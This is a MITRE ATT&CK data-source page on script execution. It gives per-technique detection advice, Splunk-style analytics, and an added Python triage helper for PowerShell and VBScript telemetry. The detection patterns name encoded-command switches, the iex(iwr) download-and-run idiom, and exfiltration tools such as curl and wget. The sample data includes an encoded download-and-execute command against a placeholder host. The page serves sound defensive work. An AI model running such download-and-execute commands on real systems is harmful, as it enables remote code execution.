Script

A file or stream containing a list of commands, allowing them to be launched in sequence.[1][2][3]

ID: DS0012
Platforms: ESXi, Windows
Collection Layer: Host
Contributors: Center for Threat-Informed Defense (CTID)
Version: 1.2
Created: 20 October 2021
Last Modified: 18 April 2025

Data Components

Script: Script Execution

The execution of a text file that contains code via the interpreter.

Data Collection Measures:

  • Windows Event Logs:
    • Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
    • Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (powershell.exe, wscript.exe, cscript.exe).
    • Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
  • Sysmon (Windows):
    • Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
    • Event ID 11 (File Creation) – Detects new script files written to disk before execution.
  • Endpoint Detection and Response (EDR) Tools:
    • Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
  • PowerShell Logging:
    • Enable Module Logging: Logs all loaded modules and cmdlets.
    • Enable Script Block Logging: Captures complete PowerShell script execution history.
  • SIEM Detection Rules:
    • Detect script execution with obfuscated, encoded, or remote URLs.
    • Alert on script executions using -EncodedCommand or iex(iwr).

Detections (Domain, ID, Name, Detects)
Enterprise T1560 Archive Collected Data

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.002 Archive via Library

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.003 Archive via Custom Method

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1119 Automated Collection

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

ICS T0802 Automated Collection

Monitor for any suspicious attempts to enable script execution on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible, to determine their actions and intent.

Enterprise T1020 Automated Exfiltration

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Detecting Automated Script Execution for Exfiltration

(EventCode=1 OR source="/var/log/audit/audit.log" type="execve")
| where like(script_path, "%.ps1") OR like(script_path, "%.sh") OR like(script_path, "%.py") OR like(script_path, "%.bat")
| where command IN ("scp", "rsync", "ftp", "curl", "wget")
| eval risk_score=case(like(script_path, "%.ps1"), 9, like(script_path, "%.sh"), 8, like(script_path, "%.bat"), 7)
| where risk_score >= 8
| stats count by _time, host, user, script_path, command, risk_score

Enterprise T1651 Cloud Administration Command

Monitor the execution of scripts within virtual machines, especially those initiated via cloud management services like Azure RunCommand. In Azure, usage of Azure RunCommand can be identified via the Azure Activity Logs, and additional details on the result of executed jobs are available in the C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows directory on Windows virtual machines.[4]

Analytic 1 - Unauthorized script execution

sourcetype=azure:activity
| search script_name IN ("script.sh", "run.ps1", "start.cmd")
| where NOT user IN ("known_admins")

Enterprise T1059 Command and Scripting Interpreter

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Look for attempts to enable scripts on the system.

index=windows (EventCode=1 OR EventCode=4688 OR EventCode=4103 OR EventCode=4104) CommandLine="*script*"
| where like(script_name, "%.ps1") OR like(script_name, "%.sh") OR like(script_name, "%.py") OR like(script_name, "%.rb") OR like(script_name, "%.js") OR like(script_name, "%.vbs")
| eval hour=tonumber(strftime(_time, "%H"))
| eval suspicious_script=if(like(script_name, "%.sh") AND (hour < 8 OR hour > 18), "Yes", "No")
| where suspicious_script="Yes"

.001 PowerShell

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Script Block Logging Events

source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventID="4104" Image="powershell.exe" (CommandLine="*-enc*" OR CommandLine="*-ep bypass*" OR CommandLine="*-noni*")

.005 Visual Basic

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Note: Be aware of VBScript execution from temporary or unusual file locations, which may indicate malicious activity.

Analytic 1 - Script Execution from Temporary Locations

source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventID="4103"
| where CommandLine LIKE "%AppData%.vbs" OR CommandLine LIKE "%AppData%.vbe" OR CommandLine LIKE "%AppData%.vba"
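The SIEM detection rules listed under Data Collection Measures and the PowerShell and Visual Basic analytics above key on the same signals: PowerShell switches such as -EncodedCommand, -ep bypass and -noni, the iex(iwr) download-and-run idiom, and scripts launched from temporary locations. The triage helper below is an added example (not MITRE's code or any vendor's rule) that applies those checks to constructed process-creation records and decodes -EncodedCommand payloads so the analyst sees the plaintext; the field names, the interpreter list and the business-hours window are assumptions.

```python
import base64
import re
from datetime import datetime

# Interpreters named in the page's 4688/Sysmon guidance (assumed set).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
BUSINESS_HOURS = range(8, 18)  # the 8..18 window used by the page's analytics

# PowerShell switches the page's analytics key on: -EncodedCommand (any abbreviation), -ep bypass, -noni*.
PS_FLAG_RE = re.compile(r"(?i)(?<![\w-])-(?:e(?:c|nc?|ncodedcommand)?|ep\s+bypass|"
                        r"executionpolicy\s+bypass|noni(?:nteractive)?)(?=\s|$)")
ENC_RE = re.compile(r"(?i)(?<![\w-])-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# The iex(iwr ...) download-and-run idiom, checked on the visible and the decoded text.
DOWNLOAD_RUN_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring)\b")
# Script files launched from per-user temporary locations (the Visual Basic analytic).
TEMP_PATH_RE = re.compile(r"(?i)\\(?:AppData|Temp)\\[^\s'\"]*\.(?:vbs|vbe|vba|js|ps1|bat)\b")

def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if malformed."""
    try:
        return base64.b64decode(b64).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def analyze(event: dict) -> dict:
    """Apply the page's script-execution heuristics to one process-creation record."""
    cmd, reasons, decoded = event["cmdline"], [], None
    if event["image"].rsplit("\\", 1)[-1].lower() in INTERPRETERS:
        if PS_FLAG_RE.search(cmd):
            reasons.append("suspicious powershell switch")
        m = ENC_RE.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            reasons.append("encoded command" if decoded else "encoded command (undecodable)")
        if DOWNLOAD_RUN_RE.search(cmd + " " + (decoded or "")):
            reasons.append("download-and-execute (iex/iwr)")
        if TEMP_PATH_RE.search(cmd):
            reasons.append("script from temporary location")
        # Out-of-cycle timing only escalates a hit; it is not a finding on its own.
        if reasons and datetime.fromisoformat(event["time"]).hour not in BUSINESS_HOURS:
            reasons.append("outside business hours")
    return {"time": event["time"], "user": event["user"], "reasons": reasons, "decoded": decoded}

def triage(events):
    """Return only the records that tripped at least one heuristic."""
    return [r for r in map(analyze, events) if r["reasons"]]

# Constructed sample records (stand-ins for Sysmon Event ID 1 / 4688 fields, not real telemetry).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_SAMPLE = base64.b64encode("IEX (IWR http://example.test)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"time": "2025-04-18T03:12:00", "user": "CORP\\svc-build", "image": PS_IMAGE,
     "cmdline": f"powershell.exe -noni -ep bypass -enc {ENCODED_SAMPLE}"},
    {"time": "2025-04-18T10:05:00", "user": "CORP\\alice", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.vbs"},
    {"time": "2025-04-18T14:00:00", "user": "CORP\\patchadmin", "image": PS_IMAGE,
     "cmdline": r"powershell.exe -File C:\Scripts\patch-check.ps1"},
]
```

Calling triage(SAMPLE_EVENTS) returns the first two records with their reasons and, for the first, the decoded command; the scheduled patch script at 14:00 is not flagged.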

.007 JavaScript

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.011 Lua

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1005 Data from Local System

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

ICS T0893 Data from Local System

Monitor for any suspicious attempts to enable scripts running on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Enterprise T1140 Deobfuscate/Decode Files or Information

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1482 Domain Trust Discovery

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1615 Group Policy Discovery

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1564 Hide Artifacts

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.003 Hidden Window

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.007 VBA Stomping

Detection efforts should be placed on finding differences between VBA source code and p-code.[5] VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.[6][7]

Enterprise T1562 Impair Defenses

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.002 Disable Windows Event Logging

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1056 .002 Input Capture: GUI Input Capture

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1674 Input Injection

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Analytic 1 - Scripts injected via clipboard or keystroke simulation

(index=main sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104)
OR (index=main sourcetype=sysmon EventCode=1 (CommandLine="*osascript*" OR CommandLine="*python*" OR CommandLine="*bash*"))
| transaction user maxspan=15s
| join user [ search index=wineventlog sourcetype="WinEventLog:System" (EventCode=400 OR EventCode=20001) | search DeviceName="HID" OR DeviceName="Keyboard" | stats count by user, _time, DeviceName ]
| table _time, user, CommandLine, DeviceName

Enterprise T1559 Inter-Process Communication

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.001 Component Object Model

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. Enumeration of COM objects, via Query Registry or PowerShell, may also precede malicious use.[8][9]

.002 Dynamic Data Exchange

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. OLE and Office Open XML files can be scanned for 'DDEAUTO', 'DDE', and other strings indicative of DDE execution. https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

Enterprise T1556 .005 Modify Authentication Process: Reversible Encryption

Consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as Set-ADUser and Set-ADAccountControl, that change account configurations.

ICS T0840 Network Connection Enumeration

Monitor for any suspicious attempts to enable script execution on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1027 Obfuscated Files or Information

Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^).

Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.

.010 Command Obfuscation

Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., ^).

Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.

Enterprise T1620 Reflective Code Loading

AMSI and ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.[10][11]

ICS T0853 Scripting

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

ICS T0894 System Binary Proxy Execution

Monitor for any suspicious attempts to enable script execution on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1016 System Network Configuration Discovery

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Enterprise T1216 System Script Proxy Execution

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.001 PubPrn

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

.002 SyncAppvPublishingServer

Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

References